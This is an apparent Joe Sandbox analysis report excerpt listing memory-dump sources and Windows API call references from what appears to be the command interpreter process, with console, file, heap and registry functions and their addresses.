• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschr$iswspace
• String ID: KEYS$LIST$OFF
• API String ID: 3924973218-4129271751
APIs
• _get_osfhandle.MSVCRT ref: 0001DDA3
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0001DDD6
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000001), ref: 0001DDE5
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0001DDF0
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0001DDF9
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
APIs
• _get_osfhandle.MSVCRT ref: 00019A1C
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002D954
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A70,000000FF,00000000,000425C2,000425C0,?,?,?,?,0001D980), ref: 0002D96D
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00002000,00000000,000425C2,000425C0,?,?,?,?,0001D980), ref: 0002D987
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A70,000000FF,000425C2,000425C0,?,?,?,?,0001D980), ref: 0002D9D3
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2034586978-2793719750
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00015074
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0001515F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 00029289
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspacememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2220997661-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00037121
                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00037197
                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000371FF
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • %WINDOWS_COPYRIGHT%, xrefs: 00037107
                                                                                                                                                                                                                                                                                                                                                                                                                          • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 000370EE
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1103618819-4062316587
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00032652
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00032670
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00032694
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4049970386-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00035295
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002727B: __iob_func.MSVCRT ref: 00027280
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 00035215
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: __iob_func_wcsnicmpfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1828771275-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: iswspace.MSVCRT ref: 0001AB8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: wcschr.MSVCRT ref: 0001AB9E
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001B3FC
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001B40E
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3458554142-2256444845
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00014D66
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00014D8A
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00014D95
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00014D5C
                                                                                                                                                                                                                                                                                                                                                                                                                          • UBR, xrefs: 00014D82
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001FD3A
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsspn.MSVCRT ref: 0001FF18
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00022229,00000000,-00000105,?,00000000,00000000), ref: 0002000F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1535828850-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset$_setjmp3
• String ID:
• API String ID: 4215035025-0
APIs
• memset.MSVCRT ref: 00039631
• memset.MSVCRT ref: 0003964F
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• _wcsicmp.MSVCRT ref: 000396FD
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 0003971B
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00039733
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: memset$_wcsicmp
• String ID:
• API String ID: 1670951261-0
APIs
• _get_osfhandle.MSVCRT ref: 00039527
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003952F
• _get_osfhandle.MSVCRT ref: 000395B5
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 000395BD
  • Part of subcall function 00038C50: longjmp.MSVCRT(00050A70,00000001,0001206C,00015E68,?,?,?,?,00000000), ref: 00038CC4
  • Part of subcall function 00038C50: memset.MSVCRT ref: 00038D1D
  • Part of subcall function 00038C50: memset.MSVCRT ref: 00038D45
  • Part of subcall function 00038C50: memset.MSVCRT ref: 00038D6D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000395CC
  • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
• String ID:
• API String ID: 288106245-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 00022650
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0002F339
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 0002F347
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,?,00000104,00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 0002F383
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,000287F0,?,?,?,000287F0,00000000,?,00014A0A), ref: 0002F390
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 158340877-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00024CC2
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00038FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00024CCA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00030BFC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00030C48
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00030C71
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001E29B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001E2A3
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1013686580-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00038571
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 0003857E
                                                                                                                                                                                                                                                                                                                                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 000385C7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 000385D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 000385DC
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00027122
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00027131
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0002713A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00027143
                                                                                                                                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00027158
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,000287E5,00000000,?,00014A0A), ref: 0003484A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,000287E5,00000000,?,00014A0A), ref: 00034879
                                                                                                                                                                                                                                                                                                                                                                                                                          • _getch.MSVCRT ref: 0003487F
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000287E5,00000000,?,00014A0A), ref: 00034897
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000287E5,00000000,?,00014A0A), ref: 000348AD
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00016513: memset.MSVCRT ref: 00016593
